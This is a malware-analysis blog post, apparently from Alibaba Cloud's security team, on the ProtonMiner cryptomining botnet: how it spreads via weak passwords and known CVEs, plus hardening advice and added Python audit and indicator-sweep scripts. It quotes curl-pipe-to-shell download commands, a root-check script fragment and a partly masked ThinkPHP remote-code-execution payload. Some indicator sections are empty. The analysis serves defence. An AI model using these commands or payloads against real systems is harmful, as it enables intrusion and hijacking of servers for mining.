
ProtonMiner Gains Momentum via Expanded Attack Surface

The post provides a detailed analysis of ProtonMiner, a new cryptocurrency miner hijacker discovered by Alibaba Cloud, and security recommendations to avoid it.

Security is sometimes a very simple business: if you rely on weak passwords and use root access, there is a high chance that someone will develop malware to hack your database or web service.

This blog post provides a recent example of this truth: ProtonMiner, a new cryptocurrency miner hijacker discovered by the Alibaba Cloud security team, which has been extremely active since mid-February 2019. The post analyzes the malware (how it infects hosts, how it propagates to additional victims, its impact, and its recent distribution trend) and offers security recommendations to avoid it.

Yohai Einav, Principal Security Researcher, Alibaba Cloud Security Innovation Labs


Security researchers at Alibaba Cloud have recently detected an outbreak of a new cryptocurrency miner hijacker, which they named "ProtonMiner". This miner was very likely created by the same attacker group mentioned by TrendMicro in their December 2018 blog post. The botnet initially propagated slowly using several old vulnerabilities in ElasticSearch, yet since mid-February we have seen its popularity grow considerably as it expanded its attack surface.

This blog post provides details on how the botnet propagates itself, as well as our security recommendations for end users to avoid being infected.

Infection Outline


Step 1: The attacker controls the compromised hosts and runs one of the following commands to download uuu.sh (or update.sh, which has identical content):

/bin/bash -c curl -fsSL |sh
/bin/bash -c curl -fsSL |sh 

Step 2: The uuu.sh (or update.sh) script downloads three files: a trojan, a miner and a mining configuration file. The miner mines cryptocurrency on the compromised host, while the trojan continues to spread to other, not yet compromised hosts.

Shell Script from a Stealthy Attacker

The uuu.sh script first tries to update /etc/devtools to test whether the current account has root privileges. Only when it is running as root does the main part of the script execute and mining start.

echo 1 > /etc/devtools
# $rtdir is set earlier in the script (not shown in this excerpt)
if [ -f "$rtdir" ]
then
        echo "i am root"
        echo "goto 1" >> /etc/devtools
        # download & attack
fi

The other parts of the script show typical mining-botnet behavior: it first detects and kills the processes of other mining groups, adds itself to crontab, and alters the iptables configuration to allow communication on certain ports. However, the attacker seems to be more cautious than other malicious script authors in the following aspects:

  1. The attacker cleans up command history after itself:


  2. The attacker uses many different ProtonMail addresses as usernames in the mining configuration file. ProtonMail is the world's largest secure email service, and we named the botnet ProtonMiner after it. By using secure email addresses instead of a Monero wallet address as the mining username, the attacker makes it harder for security researchers to detect the threat and to investigate the botnet's mining profits and the number of compromised hosts.


Propagation Method Analysis

The propagation module of ProtonMiner is named "systemctI" and is written in Go. Its main function is as follows:


The trojan first initializes the IP list and the weak password list it needs for scanning. It does so by requesting and downloading the lists from the following URLs:
https://pixeldra.in/api/download/I9RRye (IP address CIDR blocks)
https://pixeldra.in/api/download/-7A5aP (weak passwords)



After that, it enters the mainScan() function, which contains multiple sub-functions to scan and exploit services.


This is the list of impacted services and corresponding vulnerabilities:

| Service | Vulnerability |
|---|---|
| Hadoop | Unauthorized access |
| Drupal | CVE-2018-7600 |
| Redis | Unauthorized access |
| Spring Data Commons | CVE-2018-1273 |
| SQL Server | Weak password |
| ElasticSearch | CVE-2014-3120 |
| Weblogic | CVE-2017-10271 |
| ThinkPHP | Two RCEs (Remote Command Execution), including CVE-2018-20062 |

For example, here is a ThinkPHP payload (the infected host name is masked for privacy reasons):

POST /index.php?s=captcha HTTP/1.1%0d%0aHost: 47.244.[xxx].xxx=system&method=get&server[REQUEST_METHOD]=url -fsSLhttp:// |sh

Distribution Trend

After extending its attack surface, ProtonMiner's distribution gained momentum, and reached a peak of about one thousand plus infections around mid-February of this year.

Figure 1: Daily distribution of devices infected by ProtonMiner

Security Recommendations

  1. We strongly advise you NOT to run database and web services under the root account. Furthermore, services like Redis and Hadoop should not be exposed to the public network.
  2. Mining botnets are very quick in updating themselves to contain new vulnerability payloads, and they create ubiquitous threats on the Internet. Alibaba's Cloud Firewall is able to detect, block and protect from these kinds of threats.
  3. If you are concerned about your servers' security, but do not have a security engineer to tell you what to do, you should give Alibaba's Cloud Managed Security Service a try. Alibaba Cloud's Security experts will help you clean up malware, improve configurations, and enhance overall security.
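
One way to check a host against the first recommendation, as an added example (not an Alibaba Cloud tool): it reads the output of ss -ltnp and ps -eo pid,user,comm and flags services from the table above that listen on all interfaces or run as root. The port numbers are the services' usual defaults and, like the function names and the sample output, are assumptions.

```python
import re

# Services from the page's table with their usual default ports (assumed).
WATCHED_PORTS = {6379: "Redis", 8088: "Hadoop YARN", 9200: "ElasticSearch",
                 1433: "SQL Server", 7001: "WebLogic"}
ANY_ADDR = {"0.0.0.0", "*", "[::]", "::"}
PID_RE = re.compile(r"pid=(\d+)")

# Constructed sample output of `ss -ltnp` and `ps -eo pid,user,comm`.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 511    0.0.0.0:6379 0.0.0.0:* users:(("redis-server",pid=812,fd=6))
LISTEN 0 4096 127.0.0.1:9200 0.0.0.0:* users:(("java",pid=900,fd=300))
LISTEN 0 128          *:8088       *:* users:(("java",pid=950,fd=210))
LISTEN 0 128    0.0.0.0:22   0.0.0.0:* users:(("sshd",pid=700,fd=3))
"""
SAMPLE_PS = """\
  PID USER     COMMAND
  700 root     sshd
  812 root     redis-server
  900 elastic  java
  950 hadoop   java
"""


def parse_ps(ps_text):
    """Map pid -> user from `ps -eo pid,user,comm` output."""
    rows = (line.split() for line in ps_text.splitlines())
    return {int(r[0]): r[1] for r in rows if len(r) >= 2 and r[0].isdigit()}


def audit(ss_text, ps_text):
    """Return sorted (service, port, pid, issue) tuples for watched listeners."""
    owners, findings = parse_ps(ps_text), set()
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header or non-listening socket
        addr, _, port = fields[3].rpartition(":")
        if not port.isdigit() or int(port) not in WATCHED_PORTS:
            continue
        match = PID_RE.search(line)
        pid = int(match.group(1)) if match else -1  # -1: no process column
        row = (WATCHED_PORTS[int(port)], int(port), pid)
        if addr in ANY_ADDR:
            findings.add(row + ("listens on all interfaces",))
        if owners.get(pid) == "root":
            findings.add(row + ("runs as root",))
    return sorted(findings)
```

A listener on all interfaces is reachable from the public network only if the firewall or security group in front of the host allows it, so treat that finding as a prompt to check those rules.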


C&C servers:


Filename md5
update.sh ce10c8da626e5c24eab3e2f7e496cb57 (same as uuu.sh)
config.json 26baedfa378af63a2a566a7f672d5276
systemctI 359e7272c933c710476955508d687ad3
devtool 5e6b6fcd7913ae4917b0cdb0f09bf539
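
A host sweep for the indicators this post describes, as an added example (not code from Alibaba Cloud or from the malware): it looks for the /etc/devtools marker that uuu.sh writes, the lookalike file name systemctI, the MD5 values from the table above, and cron entries that pipe curl -fsSL into a shell. The function names, the cron locations, the size cap and the idea that the cron entry reuses the Step 1 command form are assumptions of this example.

```python
import hashlib
import re
from pathlib import Path

# MD5 values copied from the indicator table on this page.
PAGE_MD5 = {
    "ce10c8da626e5c24eab3e2f7e496cb57": "update.sh / uuu.sh",
    "26baedfa378af63a2a566a7f672d5276": "config.json",
    "359e7272c933c710476955508d687ad3": "systemctI",
    "5e6b6fcd7913ae4917b0cdb0f09bf539": "devtool",
}
# Step 1 command form: curl -fsSL <url> | sh (assumed to recur in cron entries).
PIPE_TO_SH = re.compile(r"curl\s+-fsSL\b[^|\n]*\|\s*(?:ba)?sh\b")
CRON_PATHS = ("etc/crontab", "etc/cron.d/", "var/spool/cron/")  # assumed locations
MAX_HASH_BYTES = 64 * 1024 * 1024  # assumed cap: do not hash very large files


def md5_of(path):
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def triage(root, known_md5=PAGE_MD5):
    """Return sorted (kind, path relative to root) findings under `root`."""
    root, findings = Path(root), set()
    for path in root.rglob("*"):
        try:
            if path.is_symlink() or not path.is_file():
                continue
            rel = path.relative_to(root).as_posix()
            # uuu.sh appends "goto 1" to /etc/devtools once it confirms root.
            if rel == "etc/devtools" and "goto 1" in path.read_text(errors="replace"):
                findings.add(("root-marker", rel))
            # The propagation module ends in a capital I, imitating "systemctl".
            if path.name == "systemctI":
                findings.add(("lookalike-name", rel))
            if path.stat().st_size <= MAX_HASH_BYTES and md5_of(path) in known_md5:
                findings.add(("known-md5", rel))
            if rel.startswith(CRON_PATHS) and PIPE_TO_SH.search(
                    path.read_text(errors="replace")):
                findings.add(("cron-pipe-to-sh", rel))
        except OSError:
            continue  # unreadable entry: skip it rather than abort the sweep
    return sorted(findings)
```

Run it against a mounted snapshot or a specific directory tree rather than a live /, where pseudo-filesystems such as /proc would be walked too.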

Pool address:

Usernames at pool:


